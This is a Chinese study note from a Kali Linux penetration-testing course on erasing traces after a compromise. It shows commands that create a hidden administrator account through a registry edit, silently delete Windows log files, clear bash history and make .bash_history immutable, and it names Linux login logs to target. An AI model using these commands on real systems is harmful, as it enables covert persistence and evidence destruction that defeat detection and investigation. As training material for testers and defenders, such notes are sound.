本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. 清除渗透攻击痕迹
1.清除渗透攻击痕迹
最多也只是清除本地记录,如果有日志服务器的话还是会被记录下所有操作
windows 系统
•禁止在登陆界面显示新建账号 •REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersio\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0 •del %WINDIR%\*.log /a/s/q/f •History •日志 •auth.log / secure •btmp / wtmp •lastlog / faillog •其他日志和 HIDS 等 # 控制系统之后,新建账号并添加管理员组 C:\>net user user4 123456 /add 命令成功完成。 C:\>net localgroup administrators user4 /add 命令成功完成。 # 这样开机登录的界面会显示这个账户 # 可以通过添加注册表来隐藏 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user4 /T REG_DWORD /D 0 C:\>REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user4 /T REG_DWORD /D 0 操作成功结束 # 但是使用 net user 还是可以查看到这个账户 # 强制静默删除日志 C:\>del %WINDIR%\*.log /a/s/q/f
Linux 系统
root@kali:~# history # history 记录保存在 .bash_history root@kali:~# ls -l .bash_history -rw------- 1 root root 15418 3月 4 00:28 .bash_history # 擦除痕迹 root@kali:~# history -c root@kali:~# lsattr --------------e---- ./Downloads --------------e---- ./Desktop --------------e---- ./testDir --------------e---- ./Pictures --------------e---- ./Public --------------e---- ./vmware-tools-patches --------------e---- ./Videos --------------e---- ./Documents --------------e---- ./Music --------------e---- ./Templates root@kali:~# chattr -h Usage: chattr [-pRVf] [-+=aAcCdDeijPsStTu] [-v version] files... # 修改文件属性让其无法被写入数据 root@kali:~# touch 456.txt root@kali:~# lsattr 456.txt --------------e---- 456.txt root@kali:~# ifconfig > 456.txt root@kali:~# chattr +i 456.txt root@kali:~# lsattr 456.txt ----i---------e---- 456.txt root@kali:~# ifconfig > 456.txt -bash: 456.txt: 不允许的操作 # 修改 .bash_history,让其无法被写入,会变成只读文件 root@kali:~# chattr +i .bash_history # 日志记录 •auth.log / secure •btmp / wtmp •lastlog / faillog root@kali:~# cat /var/log/auth.log root@kali:~# cat /var/log/wtmp root@kali:~# lastlog 用户名 端口 来自 最后登陆时间 root pts/3 172.16.10.1 日 3月 4 02:30:00 -0500 2018 daemon **从未登录过** bin **从未登录过** sys **从未登录过** sync **从未登录过** games **从未登录过** man **从未登录过** lp **从未登录过** mail **从未登录过** news **从未登录过** uucp **从未登录过** proxy **从未登录过** www-data **从未登录过** backup **从未登录过** list **从未登录过** irc **从未登录过** gnats **从未登录过** nobody **从未登录过**